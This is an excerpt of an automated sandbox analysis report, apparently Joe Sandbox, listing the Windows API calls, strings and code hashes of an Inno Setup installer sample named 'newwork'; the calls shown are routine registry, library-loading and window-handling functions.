                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open
                                                                                        • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                        • API String ID: 71445658-2565060666
                                                                                        • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                        • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                        • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                        • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                        APIs
                                                                                          • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                        • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                        • API String ID: 2906209438-2320870614
                                                                                        • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                        • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                        • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                        • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                        APIs
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLibraryLoadModeProc
                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                        • API String ID: 2492108670-2683653824
                                                                                        • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                        • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                        • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                        • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                        APIs
                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2574300362-0
                                                                                        • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                        • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                        • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                        • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                        APIs
                                                                                        • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Append$System
                                                                                        • String ID:
                                                                                        • API String ID: 1489644407-0
                                                                                        • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                        • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                        • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                        • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                        APIs
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                        • TranslateMessage.USER32(?), ref: 0042448F
                                                                                        • DispatchMessageA.USER32(?), ref: 00424499
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 4217535847-0
                                                                                        • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                        • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                        • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                        • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                        APIs
                                                                                        • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                        • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Prop$Window
                                                                                        • String ID:
                                                                                        • API String ID: 3363284559-0
                                                                                        • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                        • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                        • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                        • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                        • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                        • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableEnabledVisible
                                                                                        • String ID:
                                                                                        • API String ID: 3234591441-0
                                                                                        • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                        • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                        • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                        • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                        APIs
                                                                                        • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveWindow
                                                                                        • String ID: PrepareToInstall
                                                                                        • API String ID: 2558294473-1101760603
                                                                                        • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                        • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                        • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                        • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /:*?"<>|
                                                                                        • API String ID: 0-4078764451
                                                                                        • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                        • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                        • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                        • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                        APIs
                                                                                        • SetActiveWindow.USER32(?), ref: 00482676
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveWindow
                                                                                        • String ID: InitializeWizard
                                                                                        • API String ID: 2558294473-2356795471
                                                                                        • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                        • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                        • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                        • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                        • API String ID: 47109696-1019749484
                                                                                        • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                        • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                        • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                        • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                        APIs
                                                                                        • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                        Strings
                                                                                        • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID: Inno Setup: Setup Version
                                                                                        • API String ID: 3702945584-4166306022
                                                                                        • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                        • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                        • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                        • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                        APIs
                                                                                        • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID: NoModify
                                                                                        • API String ID: 3702945584-1699962838
                                                                                        • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                        • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                        • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                        • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                        APIs
                                                                                        • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                          • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                          • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                          • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                        • SendNotifyMessageA.USER32(0001041E,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                        • String ID:
                                                                                        • API String ID: 2649214853-0
                                                                                        • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                        • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                        • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                        • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                          • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMetricsMultiSystemWide
                                                                                        • String ID: /G
                                                                                        • API String ID: 224039744-2088674125
                                                                                        • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                        • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                        • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                        • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                          • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                          • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                          • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                          • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
